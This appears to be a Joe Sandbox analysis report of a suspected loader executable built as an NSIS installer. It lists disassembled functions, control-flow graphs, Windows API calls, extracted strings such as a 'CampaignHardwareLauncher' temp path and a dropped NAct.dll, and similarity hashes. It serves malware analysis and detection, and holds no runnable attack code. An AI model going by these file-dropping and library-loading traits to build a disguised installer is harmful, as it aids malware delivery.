                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_Loader.jbxd
                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                • API ID: Find$CloseFileFirst
                                                                                                                                                                                                                                                                                                                • String ID: jF
                                                                                                                                                                                                                                                                                                                • API String ID: 2295610775-3349280890
                                                                                                                                                                                                                                                                                                                • Opcode ID: a5aa16d55819016c4e26a60e9ec5dfcaedf525e35b4e30500cf5e78c71265be2
                                                                                                                                                                                                                                                                                                                • Instruction ID: ae54cbf5f70e9060ab25dbcc7d0ddb8e13a77f3b50f8061b144b06f1ffcf0783
                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: a5aa16d55819016c4e26a60e9ec5dfcaedf525e35b4e30500cf5e78c71265be2
                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: C8D01231A141215BD7105778AD0C89B7E9CDF0A330366CA32F866F11F5D3348C2186ED
                                                                                                                                                                                                                                                                                                                Function 00406328 Relevance: 4.5, APIs: 3, Instructions: 18libraryloaderCOMMON
                                                                                                                                                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                                                                                                control_flow_graph 874 406328-40633e GetModuleHandleA 875 406340-406349 LoadLibraryA 874->875 876 40634b-406353 GetProcAddress 874->876 875->876 877 406359-40635b 875->877 876->877
                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                • GetModuleHandleA.KERNEL32(?,?,00000020,004038F2,00000008), ref: 00406336
                                                                                                                                                                                                                                                                                                                • LoadLibraryA.KERNELBASE(?,?,?,00000020,004038F2,00000008), ref: 00406341
                                                                                                                                                                                                                                                                                                                • GetProcAddress.KERNEL32(00000000), ref: 00406353
                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2224660340.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2224535606.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2224698971.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2224726858.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2224726858.0000000000410000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2224726858.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2224726858.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2224726858.00000000004D7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2224935191.0000000000560000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_Loader.jbxd
                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                • API ID: AddressHandleLibraryLoadModuleProc
                                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                                • API String ID: 310444273-0
                                                                                                                                                                                                                                                                                                                • Opcode ID: 2fa3fc2bddc204e922c82fa426c5bb1cc5fbaa7aed8e5e7daaeaf6592e3c6ac6
                                                                                                                                                                                                                                                                                                                • Instruction ID: 7c6873576e710d3586a353c563cf751ff2fc1cfd2ce2d1275f1b712779c4e249
                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 2fa3fc2bddc204e922c82fa426c5bb1cc5fbaa7aed8e5e7daaeaf6592e3c6ac6
                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: A8D01232200111D7C7005FA5AD48A5FB77DAE95A11706843AF902F3171E734D911E6EC
                                                                                                                                                                                                                                                                                                                Function 004015A0 Relevance: 59.9, APIs: 15, Strings: 19, Instructions: 351sleepfilewindowCOMMON
                                                                                                                                                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                                                                                                control_flow_graph 0 4015a0-4015f4 1 4030e3-4030ec 0->1 2 4015fa 0->2 30 4030ee-4030f2 1->30 3 401601-401611 call 4062cf 2->3 4 401742-40174f 2->4 5 401962-40197d call 40145c GetFullPathNameW 2->5 6 4019ca-4019e6 call 40145c SearchPathW 2->6 7 40176e-401794 call 40145c call 4062cf SetFileAttributesW 2->7 8 401650-401668 call 40137e call 4062cf call 40139d 2->8 9 4017b1-4017d8 call 40145c call 4062cf call 405d85 2->9 10 401672-401686 call 40145c call 4062cf 2->10 11 401693-4016ac call 401446 call 4062cf 2->11 12 401715-401731 2->12 13 401616-40162d call 40145c call 4062cf call 404f9e 2->13 14 4016d6-4016db 2->14 15 401736-40173d 2->15 16 401897-4018a7 call 40145c call 406301 2->16 17 4018db-401910 call 40145c * 3 call 4062cf MoveFileW 2->17 18 40163c-401645 2->18 19 4016bd-4016d1 call 4062cf SetForegroundWindow 2->19 3->30 21 401751-401755 ShowWindow 4->21 22 401758-40175f 4->22 61 4019a3-4019a8 5->61 62 40197f-401984 5->62 6->1 67 4019ec-4019f8 6->67 7->1 80 40179a-4017a6 call 4062cf 7->80 91 40166d 8->91 104 401864-40186c 9->104 105 4017de-4017fc call 405d32 CreateDirectoryW 9->105 81 401689-40168e call 404f9e 10->81 86 4016b1-4016b8 Sleep 11->86 87 4016ae-4016b0 11->87 12->30 38 401632-401637 13->38 36 401702-401710 14->36 37 4016dd-4016fd call 401446 14->37 40 4030dd-4030de 15->40 82 4018c2-4018d6 call 4062cf 16->82 83 4018a9-4018bd call 4062cf 16->83 116 401912-401919 17->116 117 40191e-401921 17->117 18->38 39 401647-40164e PostQuitMessage 18->39 19->1 21->22 22->1 43 401765-401769 ShowWindow 22->43 36->1 37->1 38->30 39->38 40->1 57 4030de call 405f7d 40->57 43->1 57->1 74 4019af-4019b2 61->74 73 401986-401989 62->73 62->74 67->1 67->40 73->74 84 40198b-401993 call 406301 73->84 74->1 88 4019b8-4019c5 GetShortPathNameW 74->88 99 4017ab-4017ac 80->99 81->1 82->30 83->30 84->61 109 401995-4019a1 call 406035 84->109 86->1 87->86 88->1 91->30 99->1 107 401890-401892 104->107 108 40186e-40188b call 404f9e call 406035 SetCurrentDirectoryW 104->108 120 401846-40184e call 4062cf 105->120 121 4017fe-401809 GetLastError 105->121 107->81 108->1 109->74 116->81 122 401923-40192b call 406301 117->122 123 40194a-401950 117->123 136 401853-401854 120->136 126 401827-401832 GetFileAttributesW 121->126 127 40180b-401825 GetLastError call 4062cf 121->127 122->123 137 40192d-401948 call 406c94 call 404f9e 122->137 125 401957-40195d call 4062cf 123->125 125->99 134 401834-401844 call 4062cf 126->134 135 401855-40185e 126->135 127->135 134->136 135->104 135->105 136->135 137->125
                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                • PostQuitMessage.USER32(00000000), ref: 00401648
                                                                                                                                                                                                                                                                                                                • Sleep.KERNEL32(00000000,?,00000000,00000000,00000000), ref: 004016B2
                                                                                                                                                                                                                                                                                                                • SetForegroundWindow.USER32(?), ref: 004016CB
                                                                                                                                                                                                                                                                                                                • ShowWindow.USER32(?), ref: 00401753
                                                                                                                                                                                                                                                                                                                • ShowWindow.USER32(?), ref: 00401767
                                                                                                                                                                                                                                                                                                                • SetFileAttributesW.KERNEL32(00000000,00000000,?,000000F0), ref: 0040178C
                                                                                                                                                                                                                                                                                                                • CreateDirectoryW.KERNELBASE(?,00000000,00000000,0000005C,?,?,?,000000F0,?,000000F0), ref: 004017F4
                                                                                                                                                                                                                                                                                                                • GetLastError.KERNEL32(?,?,000000F0,?,000000F0), ref: 004017FE
                                                                                                                                                                                                                                                                                                                • GetLastError.KERNEL32(?,?,000000F0,?,000000F0), ref: 0040180B
                                                                                                                                                                                                                                                                                                                • GetFileAttributesW.KERNELBASE(?,?,?,000000F0,?,000000F0), ref: 0040182A
                                                                                                                                                                                                                                                                                                                • SetCurrentDirectoryW.KERNELBASE(?,C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt658,?,000000E6,C:\Users\user\AppData\Local\Temp\nscB629.tmp\NAct.dll,?,?,?,000000F0,?,000000F0), ref: 00401885
                                                                                                                                                                                                                                                                                                                • MoveFileW.KERNEL32(00000000,?), ref: 00401908
                                                                                                                                                                                                                                                                                                                • GetFullPathNameW.KERNEL32(00000000,00002004,00000000,?,00000000,000000E3,C:\Users\user\AppData\Local\Temp\nscB629.tmp\NAct.dll,?,00000000,00000000,?,?,?,?,?,000000F0), ref: 00401975
                                                                                                                                                                                                                                                                                                                • GetShortPathNameW.KERNEL32(00000000,00000000,00002004), ref: 004019BF
                                                                                                                                                                                                                                                                                                                • SearchPathW.KERNEL32(00000000,00000000,00000000,00002004,00000000,?,000000FF,?,00000000,00000000,?,?,?,?,?,000000F0), ref: 004019DE
                                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                                • Rename on reboot: %s, xrefs: 00401943
                                                                                                                                                                                                                                                                                                                • IfFileExists: file "%s" exists, jumping %d, xrefs: 004018AD
                                                                                                                                                                                                                                                                                                                • Rename: %s, xrefs: 004018F8
                                                                                                                                                                                                                                                                                                                • detailprint: %s, xrefs: 00401679
                                                                                                                                                                                                                                                                                                                • BringToFront, xrefs: 004016BD
                                                                                                                                                                                                                                                                                                                • Jump: %d, xrefs: 00401602
                                                                                                                                                                                                                                                                                                                • SetFileAttributes: "%s":%08X, xrefs: 0040177B
                                                                                                                                                                                                                                                                                                                • Sleep(%d), xrefs: 0040169D
                                                                                                                                                                                                                                                                                                                • C:\Users\user\AppData\Local\Temp\nscB629.tmp\NAct.dll, xrefs: 00401864, 00401912, 00401936
                                                                                                                                                                                                                                                                                                                • Aborting: "%s", xrefs: 0040161D
                                                                                                                                                                                                                                                                                                                • C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt658, xrefs: 00401878
                                                                                                                                                                                                                                                                                                                • Rename failed: %s, xrefs: 0040194B
                                                                                                                                                                                                                                                                                                                • IfFileExists: file "%s" does not exist, jumping %d, xrefs: 004018C6
                                                                                                                                                                                                                                                                                                                • CreateDirectory: can't create "%s" (err=%d), xrefs: 00401815
                                                                                                                                                                                                                                                                                                                • Call: %d, xrefs: 0040165A
                                                                                                                                                                                                                                                                                                                • CreateDirectory: "%s" created, xrefs: 00401849
                                                                                                                                                                                                                                                                                                                • SetFileAttributes failed., xrefs: 004017A1
                                                                                                                                                                                                                                                                                                                • CreateDirectory: "%s" (%d), xrefs: 004017BF
                                                                                                                                                                                                                                                                                                                • CreateDirectory: can't create "%s" - a file already exists, xrefs: 00401837
                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2224660340.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2224535606.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2224698971.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2224726858.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2224726858.0000000000410000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2224726858.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2224726858.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2224726858.00000000004D7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2224935191.0000000000560000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_Loader.jbxd
                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                • API ID: FilePathWindow$AttributesDirectoryErrorLastNameShow$CreateCurrentForegroundFullMessageMovePostQuitSearchShortSleep
                                                                                                                                                                                                                                                                                                                • String ID: Aborting: "%s"$BringToFront$C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt658$C:\Users\user\AppData\Local\Temp\nscB629.tmp\NAct.dll$Call: %d$CreateDirectory: "%s" (%d)$CreateDirectory: "%s" created$CreateDirectory: can't create "%s" (err=%d)$CreateDirectory: can't create "%s" - a file already exists$IfFileExists: file "%s" does not exist, jumping %d$IfFileExists: file "%s" exists, jumping %d$Jump: %d$Rename failed: %s$Rename on reboot: %s$Rename: %s$SetFileAttributes failed.$SetFileAttributes: "%s":%08X$Sleep(%d)$detailprint: %s
                                                                                                                                                                                                                                                                                                                • API String ID: 2872004960-2526491833
                                                                                                                                                                                                                                                                                                                • Opcode ID: 26725fba0c67dd5ef96a9c675576816e85dd1f0f980fe61be668e0bb381e457c
                                                                                                                                                                                                                                                                                                                • Instruction ID: d546d874ac51cf0a7c72b7d7aee7a5a926bf82a1b22bfeef9e4f81a1fba4758f
                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 26725fba0c67dd5ef96a9c675576816e85dd1f0f980fe61be668e0bb381e457c
                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 9EB1F435A00214ABDB10BFA1DD55DAE3F69EF44324B21817FF806B61E2DA3D4E40C66D
                                                                                                                                                                                                                                                                                                                Function 00405958 Relevance: 45.7, APIs: 15, Strings: 11, Instructions: 233stringregistrylibraryCOMMON
                                                                                                                                                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                                                                                                control_flow_graph 267 405958-405970 call 406328 270 405972-405982 call 405f7d 267->270 271 405984-4059bc call 405eff 267->271 280 4059df-405a08 call 403ec1 call 4067aa 270->280 276 4059d4-4059da lstrcatW 271->276 277 4059be-4059cf call 405eff 271->277 276->280 277->276 285 405a9c-405aa4 call 4067aa 280->285 286 405a0e-405a13 280->286 292 405ab2-405ab9 285->292 293 405aa6-405aad call 406831 285->293 286->285 288 405a19-405a41 call 405eff 286->288 288->285 294 405a43-405a47 288->294 296 405ad2-405af7 LoadImageW 292->296 297 405abb-405ac1 292->297 293->292 298 405a49-405a58 call 405d32 294->298 299 405a5b-405a67 lstrlenW 294->299 301 405b92-405b9a call 40141d 296->301 302 405afd-405b3f RegisterClassW 296->302 297->296 300 405ac3-405ac8 call 403ea0 297->300 298->299 304 405a69-405a77 lstrcmpiW 299->304 305 405a8f-405a97 call 40674e call 406035 299->305 300->296 316 405ba4-405baf call 403ec1 301->316 317 405b9c-405b9f 301->317 307 405c61 302->307 308 405b45-405b8d SystemParametersInfoW CreateWindowExW 302->308 304->305 312 405a79-405a83 GetFileAttributesW 304->312 305->285 311 405c63-405c6a 307->311 308->301 318 405a85-405a87 312->318 319 405a89-405a8a call 40677d 312->319 325 405bb5-405bd2 ShowWindow LoadLibraryW 316->325 326 405c38-405c40 call 405073 316->326 317->311 318->305 318->319 319->305 327 405bd4-405bd9 LoadLibraryW 325->327 328 405bdb-405bed GetClassInfoW 325->328 333 405c42-405c48 326->333 334 405c5a-405c5c call 40141d 326->334 327->328 330 405c05-405c36 DialogBoxParamW call 40141d call 403c94 328->330 331 405bef-405bff GetClassInfoW RegisterClassW 328->331 330->311 331->330 333->317 336 405c4e-405c55 call 40141d 333->336 334->307 336->317
                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                  • Part of subcall function 00406328: GetModuleHandleA.KERNEL32(?,?,00000020,004038F2,00000008), ref: 00406336
                                                                                                                                                                                                                                                                                                                  • Part of subcall function 00406328: LoadLibraryA.KERNELBASE(?,?,?,00000020,004038F2,00000008), ref: 00406341
                                                                                                                                                                                                                                                                                                                  • Part of subcall function 00406328: GetProcAddress.KERNEL32(00000000), ref: 00406353
                                                                                                                                                                                                                                                                                                                • lstrcatW.KERNEL32(004DF0C0,00451D98,80000001,Control Panel\Desktop\ResourceLocale,00000000,00451D98,00000000,00000006,004CF0A0,-00000002,00000000,004E30C8,00403AED,?), ref: 004059DA
                                                                                                                                                                                                                                                                                                                • lstrlenW.KERNEL32(0046E220,?,?,?,0046E220,00000000,004D30A8,004DF0C0,00451D98,80000001,Control Panel\Desktop\ResourceLocale,00000000,00451D98,00000000,00000006,004CF0A0), ref: 00405A5C
                                                                                                                                                                                                                                                                                                                • lstrcmpiW.KERNEL32(0046E218,.exe,0046E220,?,?,?,0046E220,00000000,004D30A8,004DF0C0,00451D98,80000001,Control Panel\Desktop\ResourceLocale,00000000,00451D98,00000000), ref: 00405A6F
                                                                                                                                                                                                                                                                                                                • GetFileAttributesW.KERNEL32(0046E220), ref: 00405A7A
                                                                                                                                                                                                                                                                                                                  • Part of subcall function 00405F7D: wsprintfW.USER32 ref: 00405F8A
                                                                                                                                                                                                                                                                                                                • LoadImageW.USER32(00000067,00000001,00000000,00000000,00008040,004D30A8), ref: 00405AE3
                                                                                                                                                                                                                                                                                                                • RegisterClassW.USER32(00476A40), ref: 00405B36
                                                                                                                                                                                                                                                                                                                • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00405B4E
                                                                                                                                                                                                                                                                                                                • CreateWindowExW.USER32(00000080,?,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 00405B87
                                                                                                                                                                                                                                                                                                                  • Part of subcall function 00403EC1: SetWindowTextW.USER32(00000000,00476AA0), ref: 00403F5C
                                                                                                                                                                                                                                                                                                                • ShowWindow.USER32(00000005,00000000), ref: 00405BBD
                                                                                                                                                                                                                                                                                                                • LoadLibraryW.KERNEL32(RichEd20), ref: 00405BCE
                                                                                                                                                                                                                                                                                                                • LoadLibraryW.KERNEL32(RichEd32), ref: 00405BD9
                                                                                                                                                                                                                                                                                                                • GetClassInfoW.USER32(00000000,RichEdit20A,00476A40), ref: 00405BE9
                                                                                                                                                                                                                                                                                                                • GetClassInfoW.USER32(00000000,RichEdit,00476A40), ref: 00405BF6
                                                                                                                                                                                                                                                                                                                • RegisterClassW.USER32(00476A40), ref: 00405BFF
                                                                                                                                                                                                                                                                                                                • DialogBoxParamW.USER32(?,00000000,004054A5,00000000), ref: 00405C1E
                                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2224660340.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2224535606.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2224698971.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2224726858.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2224726858.0000000000410000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2224726858.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2224726858.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2224726858.00000000004D7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2224935191.0000000000560000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_Loader.jbxd
                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                • API ID: ClassLoad$InfoLibraryWindow$Register$AddressAttributesCreateDialogFileHandleImageModuleParamParametersProcShowSystemTextlstrcatlstrcmpilstrlenwsprintf
                                                                                                                                                                                                                                                                                                                • String ID: F$"F$.DEFAULT\Control Panel\International$.exe$@jG$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20A$_Nb
                                                                                                                                                                                                                                                                                                                • API String ID: 608394941-2746725676
                                                                                                                                                                                                                                                                                                                • Opcode ID: 84cf0f737fdc5f52384ca8787c9bad6d12c85eeb5a98fce913dab18a482fa6e4
                                                                                                                                                                                                                                                                                                                • Instruction ID: c846f8899feab6000a015ad3d9ba4b80e1385b5ee8e185a3118195eaaf4def2f
                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 84cf0f737fdc5f52384ca8787c9bad6d12c85eeb5a98fce913dab18a482fa6e4
                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 53719175600705AEE710AB65AD89E2B37ACEB44718F00453FF906B62E2D778AC41CF6D
                                                                                                                                                                                                                                                                                                                Function 00401A1F Relevance: 26.4, APIs: 5, Strings: 10, Instructions: 185stringtimeCOMMON
                                                                                                                                                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                  • Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory("C:\Users\user\AppData\Local\Temp\nscB629.tmp\"),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
                                                                                                                                                                                                                                                                                                                  • Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3
                                                                                                                                                                                                                                                                                                                • lstrcatW.KERNEL32(00000000,00000000,install,C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt658,00000000,00000000), ref: 00401A76
                                                                                                                                                                                                                                                                                                                • CompareFileTime.KERNEL32(-00000014,?,install,install,00000000,00000000,install,C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt658,00000000,00000000), ref: 00401AA0
                                                                                                                                                                                                                                                                                                                  • Part of subcall function 00406035: lstrcpynW.KERNEL32(?,?,00002004,0040391D,00476AA0,NSIS Error), ref: 00406042
                                                                                                                                                                                                                                                                                                                  • Part of subcall function 00404F9E: lstrlenW.KERNEL32(00445D80,0042B20B,759223A0,00000000), ref: 00404FD6
                                                                                                                                                                                                                                                                                                                  • Part of subcall function 00404F9E: lstrlenW.KERNEL32(004034E5,00445D80,0042B20B,759223A0,00000000), ref: 00404FE6
                                                                                                                                                                                                                                                                                                                  • Part of subcall function 00404F9E: lstrcatW.KERNEL32(00445D80,004034E5,004034E5,00445D80,0042B20B,759223A0,00000000), ref: 00404FF9
                                                                                                                                                                                                                                                                                                                  • Part of subcall function 00404F9E: SetWindowTextW.USER32(00445D80,00445D80), ref: 0040500B
                                                                                                                                                                                                                                                                                                                  • Part of subcall function 00404F9E: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405031
                                                                                                                                                                                                                                                                                                                  • Part of subcall function 00404F9E: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040504B
                                                                                                                                                                                                                                                                                                                  • Part of subcall function 00404F9E: SendMessageW.USER32(?,00001013,?,00000000), ref: 00405059
                                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2224660340.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2224535606.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2224698971.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2224726858.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2224726858.0000000000410000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2224726858.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2224726858.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2224726858.00000000004D7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2224935191.0000000000560000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_Loader.jbxd
                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                • API ID: MessageSendlstrlen$lstrcat$CompareFileTextTimeWindowlstrcpynwvsprintf
                                                                                                                                                                                                                                                                                                                • String ID: C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt658$C:\Users\user\AppData\Local\Temp\nscB629.tmp\NAct.dll$File: error creating "%s"$File: error, user abort$File: error, user cancel$File: error, user retry$File: overwriteflag=%d, allowskipfilesflag=%d, name="%s"$File: skipped: "%s" (overwriteflag=%d)$File: wrote %d to "%s"$install
                                                                                                                                                                                                                                                                                                                • API String ID: 4286501637-3932668929
                                                                                                                                                                                                                                                                                                                • Opcode ID: a6c79b8797edba90ff87c6f369a02e78cd854d7dbfda06c6e053cd6863dc99a8
                                                                                                                                                                                                                                                                                                                • Instruction ID: 90fa90950dbbf035c4f81507b49f49b55cd41b97b653845b504dd01eb698d819
                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: a6c79b8797edba90ff87c6f369a02e78cd854d7dbfda06c6e053cd6863dc99a8
                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 8B512931901214BADB10BBB5CC46EEE3979EF05378B20423FF416B11E2DB3C9A518A6D
                                                                                                                                                                                                                                                                                                                Function 004035B3 Relevance: 17.7, APIs: 5, Strings: 5, Instructions: 182COMMON
                                                                                                                                                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                                                                                                control_flow_graph 579 4035b3-403601 GetTickCount GetModuleFileNameW call 405e7c 582 403603-403608 579->582 583 40360d-40363b call 406035 call 40677d call 406035 GetFileSize 579->583 584 4037e2-4037e6 582->584 591 403641 583->591 592 403728-403736 call 4032d2 583->592 594 403646-40365d 591->594 598 4037f1-4037f6 592->598 599 40373c-40373f 592->599 596 403661-403663 call 403336 594->596 597 40365f 594->597 603 403668-40366a 596->603 597->596 598->584 601 403741-403752 call 403368 call 403336 599->601 602 40376b-403795 GlobalAlloc call 403368 call 40337f 599->602 624 403757-403759 601->624 602->598 628 403797-4037a8 602->628 606 403670-403677 603->606 607 4037e9-4037f0 call 4032d2 603->607 608 4036f3-4036f7 606->608 609 403679-40368d call 405e38 606->609 607->598 615 403701-403707 608->615 616 4036f9-403700 call 4032d2 608->616 609->615 626 40368f-403696 609->626 619 403716-403720 615->619 620 403709-403713 call 4072ad 615->620 616->615 619->594 627 403726 619->627 620->619 624->598 630 40375f-403765 624->630 626->615 632 403698-40369f 626->632 627->592 633 4037b0-4037b3 628->633 634 4037aa 628->634 630->598 630->602 632->615 635 4036a1-4036a8 632->635 636 4037b6-4037be 633->636 634->633 635->615 637 4036aa-4036b1 635->637 636->636 638 4037c0-4037db SetFilePointer call 405e38 636->638 637->615 639 4036b3-4036d3 637->639 642 4037e0 638->642 639->598 641 4036d9-4036dd 639->641 643 4036e5-4036ed 641->643 644 4036df-4036e3 641->644 642->584 643->615 645 4036ef-4036f1 643->645 644->627 644->643 645->615
                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                • GetTickCount.KERNEL32 ref: 004035C4
                                                                                                                                                                                                                                                                                                                • GetModuleFileNameW.KERNEL32(00000000,004EB0D8,00002004,?,?,?,00000000,00403A73,?), ref: 004035E0
                                                                                                                                                                                                                                                                                                                  • Part of subcall function 00405E7C: GetFileAttributesW.KERNELBASE(00000003,004035F3,004EB0D8,80000000,00000003,?,?,?,00000000,00403A73,?), ref: 00405E80
                                                                                                                                                                                                                                                                                                                  • Part of subcall function 00405E7C: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,?,00000000,00403A73,?), ref: 00405EA2
